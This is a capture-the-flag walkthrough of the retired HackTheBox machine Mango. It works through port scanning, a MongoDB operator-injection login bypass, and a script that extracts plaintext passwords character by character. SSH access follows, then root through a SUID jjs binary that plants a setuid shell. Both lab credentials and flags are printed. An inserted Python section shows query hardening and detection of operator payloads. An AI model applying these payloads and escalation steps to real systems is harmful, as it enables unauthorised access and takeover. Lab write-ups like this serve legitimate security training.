HackTheBox Walkthrough Notes: Mango (Retired)

admin, 10 February 2024 00:55:25

Information gathering

Port scan

┌──(root㉿kali)-[~]
└─# nmap -sC -sV -A -p- --min-rate=10000 10.129.229.185
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-31 20:44 EST
Warning: 10.129.229.185 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.229.185
Host is up (0.23s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
| tls-alpn:
|_  http/1.1
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
|_http-server-header: Apache/2.4.29 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/31%OT=22%CT=1%CU=35063%PV=Y%DS=2%DC=I%G=Y%TM=65BA
OS:F820%P=x86_64-pc-linux-gnu)SEQ()SEQ(SP=107%GCD=1%ISR=10B%TI=Z%TS=A)SEQ(S
OS:P=107%GCD=1%ISR=10B%TI=Z%CI=Z%TS=A)SEQ(SP=107%GCD=1%ISR=10B%TI=Z%CI=Z%II
OS:=I%TS=C)OPS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7
OS:%O5=M53CST11NW7%O6=M53CST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%
OS:W6=7120)ECN(R=N)ECN(R=Y%DF=Y%T=40%W=7210%O=M53CNNSNW7%CC=Y%Q=)T1(R=N)T1(
OS:R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T4(R=Y%DF=Y%T=4
OS:0%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=N)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)T7(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=N)U1(R=Y%DF=N%T=40%IPL=16
OS:4%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=N)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Host: 10.129.229.185; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 143/tcp)
HOP RTT   ADDRESS
1   ... 30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 188.51 seconds

The scan shows ports 22, 80 and 443 open, and the TLS certificate on 443 carries commonName=staging-order.mango.htb. Add that hostname to /etc/hosts:

┌──(root㉿kali)-[~]
└─# cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.129.229.185  staging-order.mango.htb

Now browse to the site.

Visiting https://staging-order.mango.htb


Visiting http://staging-order.mango.htb


Exploitation

Capture the login request and run a quick username brute-force.


Every brute-force attempt comes back 200 with nothing usable. Going by the box name, the backend is probably a MongoDB database.

An article on MongoDB injection turned up (https://www.ddosi.org/b292/

MongoDB applications are prone to a basic authentication bypass: an attacker can try supplying MongoDB operators such as $eq (equal), $ne (not equal) or $gt (greater than) as field values. The insecure pattern, in a PHP application, is to build the database query directly from the form parameters:

$query = array("user" => $_POST["username"], "password" => $_POST["password"]);

If this query is then used to check login credentials, an attacker can abuse PHP's built-in associative-array handling of form fields to inject a MongoDB query that always evaluates true, bypassing authentication.

Based on this, we add MongoDB operators to the request and attempt NoSQL injection:

username[$ne]=toto&password[$regex]=.{1}
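As an added illustration (not code from the original post or the article it cites), the Python below models how PHP turns the payload above into a nested $_POST array, contrasts the quoted query construction with a type-checked version that refuses operator values, and flags logged request bodies that carry operator keys. The form parser is a constructed, one-level approximation of PHP's bracket syntax and the sample bodies are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote

def parse_php_form(body: str) -> dict:
    """Decode a form body the way PHP populates $_POST: a key written as
    username[$ne] becomes a nested array {'username': {'$ne': value}}.
    Constructed approximation of PHP's bracket syntax (one level deep)."""
    post: dict = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"([^\[]+)\[([^\]]*)\]", key)
        if m:
            post.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            post[key] = value
    return post

def vulnerable_query(post: dict) -> dict:
    """Mirrors the PHP line quoted above: whatever shape $_POST carries is
    copied straight into the MongoDB filter, operators included."""
    return {"user": post.get("username"), "password": post.get("password")}

def hardened_query(post: dict) -> dict:
    """Accept only plain strings, so a nested array (an operator such as
    $ne or $regex) is rejected before it can reach the database."""
    user, password = post.get("username"), post.get("password")
    if not isinstance(user, str) or not isinstance(password, str):
        raise ValueError("login fields must be plain strings")
    return {"user": user, "password": password}

def has_operator(query: dict) -> bool:
    """True when any field of a built filter carries a $-prefixed operator."""
    return any(isinstance(v, dict) and any(k.startswith("$") for k in v)
               for v in query.values())

OPERATOR_KEY = re.compile(r"\[\$[a-z]+\]", re.IGNORECASE)

def flag_request_bodies(bodies):
    """Detection over logged POST bodies: return those whose form keys embed
    a MongoDB operator, URL-decoding first so %5B%24ne%5D is caught too."""
    return [b for b in bodies if OPERATOR_KEY.search(unquote(b))]

# Constructed sample bodies: a normal login, the bypass payload from the
# post, and a URL-encoded variant of the same operator key.
SAMPLE_BODIES = [
    "username=mango&password=hunter2&login=login",
    "username[$ne]=toto&password[$regex]=.{1}&login=login",
    "username%5B%24ne%5D=toto&password=x&login=login",
]
```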


The response references a home.php; let's visit it.


The page reveals an email address, [email protected]

A script on GitHub can enumerate usernames and passwords through this kind of MongoDB injection:

https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration
# python3 nosqli-user-pass-enum.py
usage: nosqli-user-pass-enum.py [-h] [-u URL] [-up parameter] [-pp parameter] [-op parameters] [-ep parameter] [-m Method]

options:
  -h, --help      show this help message and exit
  -u URL          Form submission url. Eg: http://example.com/index.php
  -up parameter   Parameter name of the username. Eg: username, user
  -pp parameter   Parameter name of the password. Eg: password, pass
  -op parameters  Other paramters with the values. Separate each parameter with a comma(,). Eg: login:Login, submit:Submit
  -ep parameter   Parameter that need to enumerate. Eg: username, password
  -m Method       Method of the form. Eg: GET/POST
None
Example: python nosqli-user-pass-enum.py -u http://example.com/index.php -up username -pp password -ep username -op login:login,submit:submit -m POST

Run the script to enumerate passwords:

┌──(root㉿kali)-[/redteam/mangodb/mongodb/mongodb]
└─# python3 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -op login:login -ep password -m POST
No pattern starts with '0'
No pattern starts with '1'
No pattern starts with '2'
No pattern starts with '3'
No pattern starts with '4'
No pattern starts with '5'
No pattern starts with '6'
No pattern starts with '7'
No pattern starts with '8'
No pattern starts with '9'
No pattern starts with 'a'
No pattern starts with 'b'
No pattern starts with 'c'
No pattern starts with 'd'
No pattern starts with 'e'
No pattern starts with 'f'
No pattern starts with 'g'
Pattern found that starts with 'h'
Pattern found: h3
Pattern found: h3m
Pattern found: h3mX
Pattern found: h3mXK
Pattern found: h3mXK8
Pattern found: h3mXK8R
Pattern found: h3mXK8Rh
Pattern found: h3mXK8RhU
Pattern found: h3mXK8RhU~
Pattern found: h3mXK8RhU~f
Pattern found: h3mXK8RhU~f{
Pattern found: h3mXK8RhU~f{]
Pattern found: h3mXK8RhU~f{]f
Pattern found: h3mXK8RhU~f{]f5
Pattern found: h3mXK8RhU~f{]f5H
password found: h3mXK8RhU~f{]f5H
No pattern starts with 'i'
No pattern starts with 'j'
No pattern starts with 'k'
No pattern starts with 'l'
No pattern starts with 'm'
No pattern starts with 'n'
No pattern starts with 'o'
No pattern starts with 'p'
No pattern starts with 'q'
No pattern starts with 'r'
No pattern starts with 's'
Pattern found that starts with 't'
Pattern found: t9
Pattern found: t9K
Pattern found: t9Kc
Pattern found: t9KcS
Pattern found: t9KcS3
Pattern found: t9KcS3>
Pattern found: t9KcS3>!
Pattern found: t9KcS3>!0
Pattern found: t9KcS3>!0B
Pattern found: t9KcS3>!0B#
Pattern found: t9KcS3>!0B#2
password found: t9KcS3>!0B#2
2 password(s) found:
h3mXK8RhU~f{]f5H
t9KcS3>!0B#2

That yields two passwords. Run the script again to enumerate usernames:

┌──(root㉿kali)-[/redteam/mangodb/mongodb/mongodb]
└─# python3 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -op login:login -ep username -m POST
No pattern starts with '0'
No pattern starts with '1'
No pattern starts with '2'
No pattern starts with '3'
No pattern starts with '4'
No pattern starts with '5'
No pattern starts with '6'
No pattern starts with '7'
No pattern starts with '8'
No pattern starts with '9'
Pattern found that starts with 'a'
Pattern found: ad
Pattern found: adm
Pattern found: admi
Pattern found: admin
username found: admin
No pattern starts with 'b'
No pattern starts with 'c'
No pattern starts with 'd'
No pattern starts with 'e'
No pattern starts with 'f'
No pattern starts with 'g'
No pattern starts with 'h'
No pattern starts with 'i'
No pattern starts with 'j'
No pattern starts with 'k'
No pattern starts with 'l'
Pattern found that starts with 'm'
Pattern found: ma
Pattern found: man
Pattern found: mang
Pattern found: mango
username found: mango
2 username(s) found:
admin
mango

This gives two sets of credentials:

admin:t9KcS3>!0B#2
mango:h3mXK8RhU~f{]f5H

Try logging in: the web login fails, but port 22 was open in the scan, so try SSH instead.

The mango account logs in over SSH successfully:

┌──(root㉿kali)-[/redteam/mangodb/mongodb/mongodb]
└─# sshpass -p 'h3mXK8RhU~f{]f5H' ssh mango@10.129.229.185
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Feb  2 05:09:54 UTC 2024

  System load:  0.0               Processes:           100
  Usage of /:   57.8% of 5.29GB   Users logged in:     0
  Memory usage: 14%               IP address for eth0: 10.129.229.185
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

118 packages can be updated.
18 updates are security updates.

Last login: Mon Sep 30 02:58:45 2019 from 192.168.142.138
mango@mango:~$ whoami&&id
mango
uid=1000(mango) gid=1000(mango) groups=1000(mango)

user.txt sits in admin's home directory, but mango has no permission to read it:

mango@mango:/home$ ls
admin  mango
mango@mango:/home$ cd admin
mango@mango:/home/admin$ ls
user.txt
mango@mango:/home/admin$ cat user.txt
cat: user.txt: Permission denied

Switch to the admin user with the other password recovered earlier:

mango@mango:~$ su - admin
Password:
$ whoami&&id
admin
uid=4000000000(admin) gid=1001(admin) groups=1001(admin)
$ /bin/bash -i
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

admin@mango:/home/admin$ cat user.txt
8b2e26139da12476c7d609ab50766c76

Privilege escalation

List SUID binaries owned by root:

admin@mango:/home/admin$ find / -user root -perm -4000 2>/dev/null
/bin/fusermount
/bin/mount
/bin/umount
/bin/su
/bin/ping
/snap/core/7713/bin/mount
/snap/core/7713/bin/ping
/snap/core/7713/bin/ping6
/snap/core/7713/bin/su
/snap/core/7713/bin/umount
/snap/core/7713/usr/bin/chfn
/snap/core/7713/usr/bin/chsh
/snap/core/7713/usr/bin/gpasswd
/snap/core/7713/usr/bin/newgrp
/snap/core/7713/usr/bin/passwd
/snap/core/7713/usr/bin/sudo
/snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7713/usr/lib/openssh/ssh-keysign
/snap/core/7713/usr/lib/snapd/snap-confine
/snap/core/7713/usr/sbin/pppd
/snap/core/6350/bin/mount
/snap/core/6350/bin/ping
/snap/core/6350/bin/ping6
/snap/core/6350/bin/su
/snap/core/6350/bin/umount
/snap/core/6350/usr/bin/chfn
/snap/core/6350/usr/bin/chsh
/snap/core/6350/usr/bin/gpasswd
/snap/core/6350/usr/bin/newgrp
/snap/core/6350/usr/bin/passwd
/snap/core/6350/usr/bin/sudo
/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6350/usr/lib/openssh/ssh-keysign
/snap/core/6350/usr/lib/snapd/snap-confine
/snap/core/6350/usr/sbin/pppd
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/run-mailcap
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/pkexec
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine

Two binaries in the list stand out: run-mailcap and jjs.

https://gtfobins.github.io/gtfobins/run-mailcap/
https://gtfobins.github.io/gtfobins/jjs/#suid

According to GTFOBins, both run-mailcap and jjs can be used to execute commands as root when SUID. Here we run jjs and use Java's Runtime.exec() to obtain a root shell:

admin@mango:/home/admin$ jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> Java.type('java.lang.Runtime').getRuntime().exec('cp /bin/sh /tmp/sh').waitFor()
0
jjs> Java.type('java.lang.Runtime').getRuntime().exec('chmod u+s /tmp/sh').waitFor()
0
admin@mango:/home/admin$ /tmp/sh -p
# id
uid=4000000000(admin) gid=1001(admin) euid=0(root) groups=1001(admin)
# whoami
root
# ls /root
root.txt
# cat /root/root.txt
30c7732f9b112a3f7cf812e3e2615928

Originally published on the WeChat public account XDsecurity: HackTheBox Walkthrough Notes: Mango (Retired)

When reposting, please keep the link to this article (CN-SEC 中文网, with thanks to the original author): https://cn-sec.com/archives/2485265.html
